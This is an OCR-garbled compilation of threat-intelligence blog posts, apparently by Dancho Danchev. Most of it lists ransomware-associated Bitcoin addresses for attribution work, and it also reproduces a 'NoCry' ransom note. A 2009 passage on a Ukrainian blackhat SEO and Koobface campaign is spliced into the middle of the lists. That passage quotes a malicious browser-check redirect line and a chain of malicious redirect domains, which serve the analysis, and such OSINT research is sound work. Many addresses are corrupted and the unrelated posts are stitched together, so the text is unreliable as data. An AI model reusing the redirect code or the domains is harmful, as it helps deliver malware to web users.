1PbZFxqUjNEMsHdoJHtGCaTnLHpUNMCBzg 
1PBZGajyhi8M9436Amt4SYLf9r2 BMHCEPA 
1PBzhsM46UHbUTyCXRWJaoJfskY4nYdCgX 
1PC1XBFnFSf5BQUxkv3ROANEhDgx6RSRVE 
1PC269K1libuhQr4R851KGwjJz8zRV1LugErN 
1PC44KPaa74CYXQ9Xa5KRvpWhe4isun2QU 
1Pc4rlwBWRXmJiEBQWPrw9pTdF5srESZLP 
1PC84jrN2h46PsrBsJgrtTd7WrsYT Lrov9 
1Pc8ax4ekGJ58pDmav4dRa6zPrpaqe2PY4 
1PCaEZ73m6LTP5KNf6QNP6UZVZnw8jiNYd 
1PcAufT8gg5BQotD5Ri4ta4G5thPf2HBDP 
1PCBTGy7pzDJZYWLr7iuEhyUAhY48E4cuH 
1PcEBhbfmXYiUq23u5iuhkogZCDfgHutew 
1PCG8kfjC3z414hvjNKP29bZMTptu6937M 
1PcGAXtfGTNub5sy1lEs8GhRQB7xSxpWe3V 
1PchBsZbKXu5vj5ah6tsDE365rMvcKJyVC 
1PChfEmwKsZwF TnrV3Xrfag65RXT 23fMiF 
1PcHkqTMX9D7nxFddhdVt3Bme3HmumRjHB 
1PcM4ytXhzSubRCLVVm21BG30s7gCjDAEy 
1PCmoZLoraMaLaw6TLM4FUjcVQDBc3E5sN 
1PCMVVwPgEDCTcMx5fMqQ9ksUBY Zui4Snv 
1Pcn9CGDej3iAbru9WEDMDoo5ZWRenHQuj 
1PCNEM5SrdJHgLolyjW7JZQoV61sCPekNs 
1PcQ4DRcd7Q1423ZVw5WSxmZAjyy4nePGk 
1PcrwLDF4C6ZY1FGmzG69xXTNs229geaLt 
1PCSbzQruS8b3dkP4QphR]JJjpx9NiIhNkTB 
1PcSe5wNQkLUYAvyZ9k8o0dZhQ]pixirVS2 
1PCsiGrRCj8cahdgyjEBC9ioLxKrP8dfLH 
1PcsLQ7Va7q3ZEb83xD8Juls902PhvzurU 
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1Pct2QfVrQBX8ZQG7bKKths3YxokxiHH8M 
1PCUyXgdQf9Rs3FEEp2SCaNMaQScvHQcgG 
1PcW2Ad8igh3u8UVETVmXUZAZc6QrEKZZN 
1PcWMwned6d1laVNpCnbHtvVk1JZqNgp43cR 
1PcySUWNRfMfwvFgy7YTkAxdGyYYfhjoR8 
1PCyoC3ECAHG4mxammrcSbxUjoCaVkD9OPW 
LpCYryYxKqJ 7mdZmHf2vWUfxACyXxtvj6q 
1PczM6R3mtXUww8tzqgig7BCBMez29gTDqY 
1PdleqbK5jaAUKFLJ8AWV5NzjgWRifR8v9 
1PD5yzvFgGAJdUjAPJDztqoxX8Hp6apilgP 
1Pd632YTypuU8X3TfaWe IwFj68)]FtBFobY 
1Pd9tFBx18jSLY¥YavMtxEYYjsyvrunouVyk 
1PdaPyVdm8MJ9Hx7NCvCPbzpZQm7o0CbC1C 
1PdAYjXkV6ZVYZRSRn420am7N5z8zZXKN4A 
1PDcj3pU5dn52RzP3tTvFLLbH5ZNBistql 
1PDCJRGGW1RYDhmK66XtDWI9Q1KtA6qGnUY 
1PdcPYDGbP5PZEHF6VMKwebWLpEPvxXawCA 
1Pdcv63FvEbS96sxXSm3gVoBrij6MBMe4gq 
1PddAEdBx8QjBAMB8iosfc8KTmr6EBm5wDv 
1PdeFUC60z9TfzbtihjaUYhhL69nhz9xB3 
1PDFhCUAuw34Dwgbx28jRgWGtY3E9M1wh3 
1PDfyh5bVU5pxFVfG3SfhtlqtVNUmRLNa2 
1PDh8iitV5ES7PBe3mqhEqsECjqk6q9P7V 
1pDjRrkk12pKzGs7CMc1BcrEcraaKuFER 
1PDLemF1ELH6BAAZL5i1F81NdflqDWk16R 
1pDNLZDM1LWXvC4LvxuV7KPPiJag15TWo 
1PDPsnP9mAuKCuChzvxm8ttmYiaexbc6mxX 
1PdQSvnbGtTd58NECK4eds1v1zQZ24yhCB 
1PDsZHDpAFA8YDxA1LcsEu6o0bnf7QkHx5N 
1Pdt2PJkoVaeMx9fRFah53gUXBk2NbZnyf 
1Pdu3jw8W9wkAgyE8n5yr25QVVGWuGk4el1 
1PDxot6fSy1ZUMHxyPeAg3uD9SxvCmkNFD 
1PDydGMc8AYUiIXK5CpVgTBFNMwGoxkvjvf 
1Pe26HMHQQ3WbwdA3HAhP3qwDx6p43tRbz 
1LPE3nNRMkA9eA54PXXTjUBWQjYMGgtUr8eG 
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1PE8GBGG2MmZ8020MxczLx4BYHvmVUC9R3 
1LPEa9h9JkbAAQ2QbjN2ihr3m1i4qobBZX5A 
1PEBJkT7pPFcA1Dhn90Q9bpw3t4jLygL6U 
LPEEMjLgYQxymTvN4AUPa7rZAgFgdkHu9X 
1PeeScaNTkVcyG48Q6AhvGXmr3aaGL2G5r 
1PeGBkn6YeRjk4pLOHCbiNre5Pjk88mJY9 
1PegJ9QGFmgRF8jptCHzvD1K8PWPnv4r7w 
1PEig2s1RMWqdzpw5FoMy33uJGxpVjJbZdC 
1PejA4AgYJc3pStQFbY29UaEbN87cwxZuw 
1PEK953JwQnjMoQgg3Cz9nQ21ShGN2mzao 
LPEKFYv8CP3K3zzXx68DpLvjDyfUjaJPxtp 
1PELnKvnD7gwR3Aers92X6hLaGByBr8g36 
1PeMoaT8n56jeM8M7nV9169CBYVVEyZy4y 
1PerE5ek8tawjFij 7fiUGngbFBZKNS63iF 
1PermQbLxYwEvLmMKW193zMro91qHkunBHg 
1PerzYxYd4ukRqMAHMca1DuMU3aP5bPDeg 
1PeV3LdYXL78qZgBLkK4G2T9XKXzpgNHma 
1LPEWy1zKgBSyZdtyLZYer]GXdVeqjW8TLU 
1PEXEDHmMGaQmkYqGTMXMFVNG94Yew6jwjh 
1LPExYdYq7UXRi8JgYhBqIsSLWbE1RNTjmQS 
1PeYRded2SiNCKvSHRrFLjCMBVvpo3p3wn 
1PeZ2onrjXzPAYmrhZ5Sb IcsSWedtkBGHL 
1Pf4gQDZhP5chkty3LHyxnqnxMxp9uUWEDh 
1Pf7ZDS6hMHNZHHKLOWRmRWOLpdJ1TeVTe 
1PF9IEVZo8cwxZGxFAWGghtKohKhwZCbd6 
1PFdNRASdBV3sLEmZRgxR8ZC1U1s36Zjkc 
1PfeFXN4SKuy2FeoBhNvdmDsSvpYv5RhNn 
1PfexC2gvZ7axXe7KEMSCFLNy9YGEZfYQYL 
1PFeYcwJLxLA4hAVYmEykM4tSeozepWxNB 
LPFhAZKnWj8xrtbQZ5Cp2VZVTRoRORyvWuN 
1PfifgijKemf5rnv92niEAizZryoCLQtLs 
1PFIO64PMTF43gAm1ZXY38)ZkPCc6L4PJz 
1PFjkusTdeyuLTAZMNg3iZJd4e5HPV7Sp2 
1PfNmpCdkLWLyDtYmwoE8yPNZi3TtZwpoY 
1PfQE8pxwMTjxal488YLDM2X]JpVKz3FJM9 
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1PFqwzDunKDhTKsUyjmcGec9PGbvzqih3y 
1LPFSkBj2hEKzbiBa8WGgRnxpjdGtaf55w 
1LPfskNXS8jSS2HBYrcT3vF4xGQbVxdZigc 
1Pfti8b9U6Xt6c5mRCDQucHcrDc5DAm1vX 
1PfuxpRr2U76Ecj2TfBicW5fZkdxXtleXLw 
1PFv3ZPtD6ELYSCXXiju6zMCeQ9U9KH8P8K 
1PfvjeEAJFoMyFDCcy4txdFVnXZh4SNZCu 
1PFvV2FsB5hFzrmtug2MH3X2VPO8CAFFR3 
1PfYFqaxtyD2k4jWD27LfxyqL4DgapEKxQ 
1PFzYsahR514jQuWigPr4t6CazpnSSkKr5m 
1Pg2UFHApxnBfGdQooqkXeprKDMBXZ8gbp 
1PgDbDTGWH311ZEyoxHYYws/7ddFnuoixtd 
1PgE9vt9OsfCyFj4rmL8uL9WqM2BqMXeE25 
1PGgrG95PUYuJCeb2sbpEbfCbSq6nBhjDM 


Stay tuned! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEhd3uw7 c3ZUUa0HASXylIogDSbKOzh6F1i0_wUnigKul66mp 
6zEmOIs JNpOP2601LYpxzZTDZ1FZYdFmbniYrnaCISKA9uBi1imHB_Z 


18.10.10 Exposing a Compilation of 20,000 Ransomware Themed BitCoin Trans- 
action IDs and BitCoin Addresses - An OSINT Analysis - Part Five 


(2022-10-25 16:39) 


25746 


NoCry Decryptor 


Ooooops All Your Files Are Encrypted ,NoCry 


Can I Recover My Files ? 


Yes, You Can Recover All Your Files Easily And Quickly 


But How ? 
Send The Required Amount And 


; I Will Send The Key To You For Decryption 
Your files will be lost on : 


See You Soon (0_0) 


About bitcoin Send $100 worth of bitcoin to this address: 
. a 
ge ey aera Obitc OIN Fiittask425p2GoR6dTa6gc4nkoKn@diVwk 


Dear blog readers, 


I’ve decided to further extend the ransomware themed BitCoin transaction IDs and BitCoin 
addresses obtained using public sources post series with the idea to assist everyone in their 


cyber attack and cyber campaign attribution efforts. 


Sample list of publicly accessible known ransomware themed BitCoin transaction IDs and 


BitCoin addresses include: 
1PGGxCcBbM5hahdVUtfJL8RnGg8EgCB312 
1PgjdbTwBaw4jgok1xAvQe7VMrxXZT6LxLr 
1PGKTIN1vJRExceE4kkiPSuhbQUAePbQco 
1PgkXa8xRL4j3wAaXvN2NAagbNYJoMQCuj 
1PGLDVbLWw4Ppy2w8EG3HrHi2acGC72aRg 
1PgLV4EqXod8R6iGc2zZFPyMSALev409QoL 
1PGnmxQxe6AdpMSitDs1ZzN8XxCSt9HGKhm 
1PgpSitNKZK5kjketa4ie99w195Rrjek4g 
1PgpY3GzPESubrsy1B5t7CxovbcVdKgWEh 
1PgqRGJXDhu5Dn6tUufkFsjsqFPWAm61D9F 
1PgRJziaFR3tBxfLAmxpQ4VNCVvV27T5SLg 
1PGRubz4R6CEa41kJjdR4p1sknAWhKBcEe 
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1Pgs2v5KLsu80aZcwQhiRxHxWMuSxeHt5a 
1PGSkg24aVjA30p4rALnlgxRbAwtwjJSvyW 
1PgttDwaoBn9fTlyCSS9Sqw2y7XvutQhoD 
1PGtuRJQ9wj 7TNVMnWCkwcxitwdCRZaJd9 
1PGtxXq9TD1Fe51S3ghYQvL3dgeuzFWPLx 
1PGuRwnDYfzzQzRR7QXwfaLdHGnpWExoeA 
1PgxCWyPVQrY4xiEWja9ZgX7cTuxXWuiacn 
1PGxfHdlyzmNUaX9YTkPyUiyP4PHyrVwmL 
1PGY1QaC6VtHjVJDbi888xmh71Jg4P4Csi 
1PgzYJnvt8X7A8tKXPopdA6hzm1RBlyghW 
1LpH48ryjxeieaZXZWHNLiJgWTbBLc1mMUV 
1Ph4ceZXmk4MMFP4NYnyHLvTvFGpXm9Fo9 
1PH7sHAtdvpATsxyJm6ZyN8drxCyi7JoxY 
1PHbkPyXbNV8K4p8Hh6F 2uyaRHooRik8Er 
LPHBwUD6YqhYTUCPKMCZsSa5zXHtQDNngy 
1PHe6LRMNswzPHfCJdWs7wyvC9F1RCAbfo 
1PHF3LzZPS8RLJ2n574DM6StBYjTPBuloKV 
LPHFjwirJ2atQMs20svK7WHMmJKeX371mR 
1PhGdU5eaSbAjQALAVoeCHGzRexkFaPsvb 
1PhhqLV4aPdog8yYQm9Z2YTbG1IMTqBx5HU 
1PhJuoEy]7PFGN8r6wMNtpSFbgdsQPeKRN 
1PhKa2bHCY3WKtQLIiXbVEJDizrYb4iEM3m 
1PHKLbL69DV3ZQ6SLU96Dnu33wWKYrjLhBC 
1PHnAtxaVq4KteMYuMd8PME1H1loWuvlakD 
LphpHXzSR8MuAzNyNwfzYiodzw7rD1Hju 
LPHq99kxUC9PNd8jYfvZ6K50v30Gw3LfpV 
LPHQJTwVTDnfgJ9LzbnjRCJEEfA4DaD515 
LPHQMR1yM42bxbDstGMFoGaxKhF9bUZssm 
1Phrnx1lpbeBXLZUBL5q2g2SWFX8D24ngTV 
1PHtECGf4DiyWGSU32ay92Gzg 7j6cXwGVF 
1LPhtPFYjH1BdZRKeCm5vrGP4aBokf2z4aA 
1Phu9pXXcAJ5jbjZd4AcALfFIXT 7 Bi2xPN 
LPhUoXTANCF 1jkJiNZ4AVNVU8bunAPCRSz 
1PHwgUopaNRKLgaL3EGWbAABatNBUWEL75 
1PHX38r6b1tCpEW7sqktH4WyZwy1CeQvgl 
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1Phxn8RqXDT80SfSNks23GLpbFgrkAACb7 
1LPhXoOULnNULOWFSxxt9Vj3GaZM1svfFwVt5 
LPhYABQJtdd2LsnAbyiqoJ88b7yPCBeBou 
1PhydaWU2dK1xje7EZibBhddtXgPhBUypV 
1PhYG7Lfx8H9enTEQDpi4SyNP1bLQVPsfB 
1PHYttBUW8hGKBKto27jsghejgxLd5FqKe 
1PhzEVKDpMgAvUsCTjQjdLZ9aet3dFPZuE 
1Pi9bwDCqdEZdB4aTFQccregPVVYALjaun 
1PibZNRhcXkKULZEBH48PRbe2Z8gpytickB 
1PicvcXUDLzHeuiRqZPJ1236aUweLCEyKM 
1PiHLzZ4JdtUSZDCzi1pG4BBCaZM1eGhxj4 
1PiijV8Vr4js7iE7yjyxgoCRD9QGVDWpWFR 
1PimhixE4Dm9ZZiHyJydeQUvTXoKcBu3ja 
1PIUDNRWewhnUhTxznH2c9Y7CZAL1XFNaw 
1LPiwwrUxwmj1P44xtJzVgxKe2cii 7M6RJz 
1LPIXNcjLEVRGZ3bESbfvXRgoSv266n15Fd 
1PiyMz761iZvFo2aViKFTovdxNfH5t8tqw 
1LPiIYPUFJbYT8490tYP511tzg5HFZfnaDzKk 
1PJ1KeqyVWEnuJGK78iz9buZzLecYjZB3B 
1PJ2mMRtWuyHtMSCKmvgxgh5GYYHJ4vui6i 
1Pj3JLM6vFV8ejAP5NM1aZ5WhTIcWUFywVq 
1PJ4QToisC9wkfeKTZZbiDJmv8bWdMvuD5 
1Pj5aVx69bTKPBmMWxC4zf91BeBmS4exwgG 
1PJ6GRCDqkwM4nyM9MwswnevSfYjGUtgJSQ 
1PJ9EoDyYcLn6y9ccyVJYpNA6nSJCUh6v5 
1Pja2VWR2hzfeR1Z3hK8rpMDmT5d4zPHcV 
1PjJcAgGPNMQf29S7JFUUYwm3Ya4XHbdzvsb 
1PjccFKQqM7jFSSUBX96hCeBL7REeE9InRm 
1PjD3F 7RsPfobeCNPBwDvNtjoMs4d6MCCwu 
1Pj/Do9yeoDwfnnF6WpS59ztdQZjB53m7LX 
1PjdzbwgdrZLfsZLWnqWo2VH3vudzwNbK 
1Pje5UFq8f3dNvRWgkzFXF3Kbdpoc8ZhG9 
1PjJEB9x4Cy1zxKRb5qrjiKWcLEPJQRmaqsc 
LPJFATLWHTuU9TMmqU4ve}rGqZX55yUWFSLi 
1PJG3taVqPuZZUR8GA3655iRM2ZGMkhQVd 
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1PJ)GedPmpjc3CKL4HBGT9CLMxYZZJc6o0Ta 
1PJLC2D5iFE2NbUW9Ewd29zz]DVe2aHjT8 
1PJmM8xnvMZCdgz82bEKqbEP8gkfzZp5zEu 
1Pjmasr6kP3ite2NTrSvM6UkKSR36iKR8y5 
LPJMCRVWnqSd9YhU1GTbyDUBejKA1qe9Lf 
1PJoG8WEyHaFUo074DFNycjr8uQsKZRtfK5 
1PjP3nqUYsLGECz3kG6BGF62Cti6egE4jV 
1PJpcgKcDjMdfFGre8xHGdyjqxxogy72LY 
1LPJpmnbt75Q2dNAhXxviPNP5V96dhVYYYc 
1PJQpZcxwXm8Z2nHuFmfgfnFZACIa4Wiga 
1PJsPNoeeVPiSToA2pqpPjHextGrhelewQ 
1PjTbL2fPtaxeBFscndfr9EQMshwjowBzc 
LPJtgvEY7fYNCMN8jggCe2zJCszmvx1KmF 
1Pj)WrMpUMhoED8bV4siQrRtkFmkTw9D4z} 
1PJwtmUvoKvB7RAkKXmovjsVMMtNH5K6YyZ 
1PJxd1tDY2AtxUvxN8UkKVqvMLYtZxjzqu 
1PJXEEnd3C6CiHangnb2fVrNxXiN2HQyz6 
1Pjy4pswFgisJREAWS9HNWURpUhwdAbh2b 
1PjYsZnpjaBYdfUv46xXQT2EnkfEh6as2Q 
LPjYV9OffoXmNiy2kdr8Z5iINC7wgqCReUcT 
1PK4avQxeBxNZzGetVN5QVbukmPi4DVa4t 
1PK51rpRnw2TPJFZAgwTgjJc1Cnn1XVkjij 
1PKBVJ56Fyqgzuhp23BHTEVm41WBq59rmp 
1PKbVVdtUsy7uBzV2CYEurZgamA28wGacm 
1PKfn6ézCEuAdgKbvRksJgFmJRRfeMik4PZ 
1PkfQvbiuwqBtBfNPnccgBKJNrNNQUVx19 
1PKfvmPqKhYUDQxSsKBxXLzZAMbdTCyxWtv 
LPKFVNBGTG853vgQzxXh6wVXv2uj85WdR1S 
1PkjdV2XgbWfjpJRNBjSG3vxDEfC9f8Wp7 
1PKjmMRSJsZg TISXdNWTLvb8qnZSla7QgurL 
1LPkjXHx7gTi44e9D70UYznEveHb7fSd4Pw 
1PkkHmioRVsmL6qgeGYkazZMqeegY6C1GN2 
1PkKj 7qkpPffTEZcEvTyfcvHCdXBYa8mFU 
1PkkRhHaohzKivMUAKHM4YkKqoafYinu5 Vif 
1PkkrNuSxBQc9XMyuRcz2E4kw4FX4JEjoQ 
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1PkLrz1ZibczCUJjdtp1LvxxpdHrgN4Y4m 
LPKMNQJfpdWh4kDJmsZWHZgdpHw49B7NZe 
1PkmxagMPkKrSfyYD7N1DcZ3b79YT8n6B7M 
1PkPp)GyCvBRiZn8R61e9xM2xedmxoig1b 
1PKqNjJ37NEbd6w8YSXzrTNiLj4jPtScUZ 
1PKqRf8Hg1VWAWDXM4RP42HW6d2bxX9 1iFx 
1PkKREFTGgLcGJBHMAx725DKnCv1bjhRhRd 
1PKsQcC33WMWB61iH242p2VFGiIC3YKM2fN 
1Pkt)74SPegJeboqmK97E6HyY2yRuarUmF 
1Pkts269uSb3nbT9EYcQpT 1jGuQfviEMN6 
1Pkv2XMwav2QeUpG4dcXfM5uFSPQdN3F91 
1Pkvqg5bGhw8xp2ANttiMKBsejUciMXfbk 
1PKWdLYN893RUHEYjyQf2wW4CmyYGon9Tt4 
1PkWYvRmwyS8z8nBCbGu7WT69bNnrEpVFz 
1PKY4tWoHZbyRnt6FBERb8xZgsrBJ3d9eF 
1PkycYDWTbqmvfL1jk5uGirzzRQt769EpQ 
1Pkyi27_LVbWEm2VANnqCoTP24z2DRoQjtr 
1PKZKK4xnT7fGDvqvLACH8JhUT8UJdsSHLQ 
1LPLAdS9QpmYQVN1tPkjPRFgi4RHR1Mnhpc 
1PLBTdhCud3xLfVL7eitWHviqP3Bp6R4iV 
1PLcAkcF73SWfLkF5b3tqUdDbapyFijbpL 
LPLCJhpH8jP8qhfbqo8bAeKgmPTbfevmsh 
1PLDApbWwDpfkpc2hcyk1TrhldesYLLSvT 
1PLEpAR5VEozgFWawtTuSP1sLKcAStYNVVP 
1PLf8jv6e1d687 ygFuvnsHDGnzefq6pk13 
1PLGPM5Z64NC5pxXZ9jmgYeizrvWWRzZDRwR 
1PLhEVNHQzuzEB99dR4X7bMucmHJryjGSv 
1PLMZdaEDa8amfE9BG2B5k5R1wl1AvUu3tR 
1PLoUgfDTqpSx1jnbwBoiQaxXg9d1YK7Yrv 
1PLqvqitTbafqdmfMPPT8nKaJqJTVPxZms 
1PLt6Pmjt5t9GvXqYcBszLittyDR3wb49e 
1PLVw4wCHXrdvd3bXmeSvEJGfM6dA85KrM 
1PLWxYt12gd30b3imi4QysmEgWzbFZnmp7 
LPM1EhTCv2NkKNxD2gS8JFnbSlexCymfgaqr 
1PM37w3JEsJfBYxsPMVcpXM3LUrtU8MJkw 
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1PM4hFd7k59XwD5k4KKssbAh9SYTgyebS9 
1PMa29U30fEHyz9iT9GZN2Armsuipmf63i 
1PMb1uFKCe8LGbPwpQQJCRbJGZGUkKW3Zby 
1Pme8rgELxd1VtfgZSMHLfnPE6NWViyjv3 
1PMeiU3wP7wkTtY2CPWRFjQel1HCtTwcfyai 
LPMESHJfiDUETJ24kadouTDLnGz11ligyoU 
1PMfxKyqMc52C5SyGMaj8xRZt22HWbr5FV 
1PmfyGEFy8k4pRrHeJ5fh33F5gF5bDyRU2 
LPMi3CFPG1JTpqbeqcz1Qy2qcqcVgsCeGh 
1LPmjj5X64n5)JJmAJQXYMxbnEXTqrHbmoLq 
1PmjqeaucNCmUKjcw9SHkmxPHYRsYy9BoxX 
1PmKJZVmrL3vwSVcSi49eXXF3xMyzKKp78 
1PmkLJkThAhEyrELBKDrSsxW9NihKNY9DU 
1PmmwGzHCBTd5tDGCHpRERrjso3F5k9YWb 
1LPMPyygaNHE24FkETR5UgzNjicaxhUgXGv 
1Pmq2ZSJULMNSfdYJQfK7eCu5R11ArotmH 
1PmspM5s2TYWkqmjKGSiy4Y4nDzbYhxXkVw 
1PMSuz6KFyFQvg9mr931tKjYEJdvkqxB9C 
LPMTePxW3Tz13uTtufmHmokuw7sWJKxvg7 
1PmUd61bCKbeeCMTiKUELJHM8RyzuA78S5 
1PMvL69gZstfLnpxSWcSza6Ar3FWhSMvgL 
1PmVLmMRhXZMp4MYx4gPBRWQKM1KqWdYpo 
LPMWEnhN28UwakLjoaP5TKAXNk8gqUxVmD 
LPMWgvV46PjVPUpDDon4vWxV3eW9yyVCnR 
1PmWp7BpTP8G7bR6zPHe1lppZELpFBHHLcZ 
LPMWvutLLEPfuxN7256HudXiAvsoJPM1xf 
1PmxKVe8XTgSfBiyqYyc35Axj2Z1QgPQ7fy 
1PmXqs5bj1Yt30rKbwuQ4v1syQnLHSzy9M 
1PmYAzx28CBBXZZX4tWZ6NGpN1958BcCSF 
1Pn3a7jnKvmED9CGUWHXt65d14xvEb5XP7 
1Pn4BR3G5VV3R3posioRJ4mtC3iQSdiwEy 
1PN5Z5Qo8bp38ABzY5QJWieF8w5JXEuWU8 
1Pn7QYtUsSUf4CF8v7x8Q6PppoJZbyMpVym 
1Pn9PGrRpaaNXNX9MTF85h98Wx3bdsrqqo 
1PncGLYuUVEATdWWZTpBnMdpR6nCgHPFFoY 
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The ddanchev-suck-my-dick.php file has a similar Mac, Firefox and Chrome check just 
like the U.S federal forms themed campaign, and the original "Hot News" themed campaigns 
- if (navigator.appVersion.indexOf("Mac")!=-1) window.location="http://www.zml.com/?did- 
=5663";[. The script also includes a central iFrame from the now known malicious coolinf 
.info - dash-store.coolinc .info/images/levittpedofil.html which redirects to 1008.myhome 
.tv/888.php, popoz.wo .tc/p/go.php?sid=4 and 1009.wo .tc/8/ss.php to finally load the now 
known justintimberlakestream .com/?pid=42 &sid=8f68b5. 


The bottom line - the Ukrainian "fan club" is a very decent example of a multitasking cy- 
becrime enterprise that is not only systematically abusing all the major Web 2.0 services, but 
is also directly involved with [12]the Koobface botnet. 


Monitoring of their campaigns, and take down actions would continue. 


Related posts: 

[13]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign 
[14]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding 
[15]Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware 
[16]A Peek Inside the Managed Blackhat SEO Ecosystem 


Historical OSINT of the group’s blackhat SEO campaigns pushing Koobface samples, 
and the connections between the campaigns: 

[17]Movement on the Koobface Front - Part Two - detailed account of the domain suspension 
and direct ISP take down actions against the gang during the last month 

[18]Movement on the Koobface Front 

[19]Koobface - Come Out, Come Out, Wherever You Are 

[20]Dissecting a Swine Flu Black SEO Campaign 

[21]Massive Blackhat SEO Campaign Serving Scareware 

[22]From Ukrainian Blackhat SEO Gang With Love 

[23]From Ukrainian Blackhat SEO Gang With Love - Part Two 

[24]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Black- 
hat SEO Farms 

[25]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 

[26]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


This post has been reproduced from [27]Dancho Danchev’s blog. 


1. http: //pandalabs .pandasecurity.com/archive/Be-Careful-With-Your-Search-Results.aspx 


2. http: //ddanchev. blogspot .com/2009/04/massive-blackhat-seo-campaign-serving. htm 
3. http: //ddanchev. blogspot .com/2009/07/koobface-come-out-come-out-wherever-you.htm 


4. http: //ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 
5. http: //ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


6. http: //google.com/safebrowsing/diagnostic?site=coolinc.info 


7. 
8. 
14961 

9. http: //ddanchev. blogspot . com/2009/08/dissect.ing-ongoing-us-federal-forms. html 

10. http: //ddanchev.blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 

11. http: //ddanchev.blogspot.com/2009/06/from-ukrainian-blackhat-seo-gang-with. htm 
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LPNczR5mVhLPLQNQxXohvuogZj7u2DT4Uyb 
1PND2TtbpJ3P1vQZzfCRsDiuxAX7w5S19k 
1PnEeervEzxsJjLMfdYExsdRc8LqGtZBkk 
1PNeoev4xnsT18zmNuC6HrelZwt55jZrxe 
1PNfhFLxpvBMTpJDwWWeb3Tcv1fPAdgMUV 
LPNFMVdKntbRua9cZ4Kw66wxefoWqGkKqie 
1PNg5N5E8DpUGm6yZKug6vcv9Hqb4FQBCo 
1PnGDzmuVa9HAZcCEaFfzsp75Ra39hcw4c 
1Pni6M6c8xYD1laSTqhw3kFQpG12gfmuTsv 
LPNiINtBUfz1hDg3nLkbVJsorZ5rygyyh3s 
1PniPmm5kiuuAhXpBWR3QJiUtpfAAFm2SS 
1PNLNC1YasifMfpAhPVcPRpyaBuoTup5xXt 
1PNmtik5HHAsJEyaAu5QRicnsoPXkyYCSct 
LPNNHyRcrfuT Yab7UgQdLJuTH52jFQbIMf 
1PNoCDWGZRbvDRoCRomdaFSRadke]Ji4Dne 
1PnsycQ56zYoXS|]nsdeREfSURDLJoqng62 
1PntmDEJgTn5S9LONGxwHTZAxegrvkRyrl 
1PnTXQzSYvZgaVQQPS8aABcq1oS8iE92G;j 
1PNUD2qGRd8kyShQ5h2kcinn5RkrTuG24n 
1PnvhnYFCwGi3jBsbivURbHen1lvLp506phY 
1PnvrmZzZKUQGfdicMUVSAQQniYBX3Uu9eq 
1PnwTryMu6zdmkYqqSDCSTxhAcVecLPcV4 
1PnXppsGPCr656hnuteZQfAa8UcG4GyhPr 
1PNybWHy15x328UjntxUNwGFcfAmckugVL 
1PNzfXRfHYczRSD1193hzj3ffe2DWD1d9E 
1Po3PXgxLKk3YTC4nAnzUmuMjFjsHwCWHv 
1P0529SpnmgKyGB1UcnmemiSxLPfVeWws8Ww 
1P07bg5J321xqgXzkvcqr4JpB9W7Ywn7vM 
1PoaYXcHU3q3j12ByUjMynFDBa6vZquZPq 
1PoebUjJR5pdH88tc9ECQ1PCLaCrtPnG9fm 
1PofhAeNk5wQLxPrfqjtq9a7JuPcbSuEz] 
1LPOKXN2YWgWXNRckgCDN2bQwQXCCQm]JgiY 
1Pomm4ibn36gze3Y9mhj1prUYfCf4Gg4Ja 
1PomzzsqXMcwkjr7KAPHNEckKrSkvc5TZon 
1PopQpHv1loZPbhygLCCTTnMYSokfLdivym 
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1PoQu2beCTrnFstXJej2qjH5XHDCkxfoTe 
1POSHXTo2wdSu8smqEE45ezGRVotUHkJTq 
1PoxEaLLbg61088T6xqXUAioaGyWoJqL5D 
1PoYq6fLtv9S8eU9swbkwuzZkbRWWczLDX 
1PP1JUK6V3YTMypAozU4SSKaaAfh9JzDQd 
1PP1x2d42HL6vFy7XA5haUewuD67FpwxRa 
1Pp2NY38Yv4CCHX4cCLE4MBmpxXtuqiSRLK 
1PP3UkqmD9Aizp52znysSjqljvTgnCvZCu 
1Pp4b1issh4Ey7MpxxZAFSm1hm4YCdEyJi1 
1PP68ksSRGDcELPqiHjFaxtMgoEfT8FNE5W 
1PP6D3Am4YPrShpJiNNd9GQcK73NnwzDk1 
1Pp6eMVzeY6yV3gd19Sp4L8SuliYwQy8LG 
1Pp9pb7QnsmQpmYujje3VXYGQyFpntYWUL 
1PPBRpn3cWVEt2SequsdNEUYJrHrLwGDEW 
1PpBWFijScRfFT3gF5iwZSulvFhKyhQ7BY 
1PPC2Eiivm62So3mqZ4iEv3dfz8PmAw2aa 
LPPC5hnztXcWq5uHtSYZ2BRqRjyYxj6tuQ 
1PpC8avzypraEgxE3gzjKEbEdw1TtPbEvL 
1PPdkC67r9zaxqCfzkrQtDkxtVsDC30z31 
1PPDkz8J2rFk3SWvreULUv25zn6vfdLH4B 
1PpDpUBaqr3dvoFiSJob4Bzs51CZ887SaTh 
1PpETjEc3YPF8wnXc8CxZPGTDLevbkwhK7 
1PphpqzQcaVZhBYTvhcbLDqYDuzKGCjFQ} 
1LpPkuJTj/RLW7Frozbg4rzALz1nuL9eH1P 
1LPPkY9dEUzpe5cf86SHSW4HUC7SKWnEL28 
1PpMwgDMWDPyha4U8TqmnifQtUVSCXFdkn 
1LPpnWjJLPCMGgCwd5pSrxPWvrMrEjdqYFAU 
1PpPewNfFpf1lXLagrpuQcFV69J6mKuTF23 
1LpPPFgjCUr6cVYdw3Y2HpdnFsuPRbLF1A 
1PpPnRJeBASUFv2NAFEYEP9UstqrxgrZxB 
1PPpTNSsjpzA9pAeAAUgZkFBaEU49dPFe5 
1PPRadJt2C4AgpnkPNov8hssZed7o0Up2AE 
1LPPtiCKwDiTWYrjWh1UAyrUbySAkAutBqe 
1PptLZwfJSilwv6Q1zVtPSaZMxsUAWYgFz 
1Ppv3i4V3vt8GLKD3HbRMuwH45sExPstpj 
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LPPVEYWTTEhAr58G24L9GpridHfTU1xdC6 
LPPWHDdhQFEeGtAbUKVvfjs)jvul1DX4eyc 
1PPWS9JYzDCLsheZyElyq8WErePmBpK/7LC 
1PpwTRe3WfHGTH64jzEex47U1ztocbBXbQ 
1PpY7CcTLuP1T11xiU9kz4zCXtHgTEKMJA 
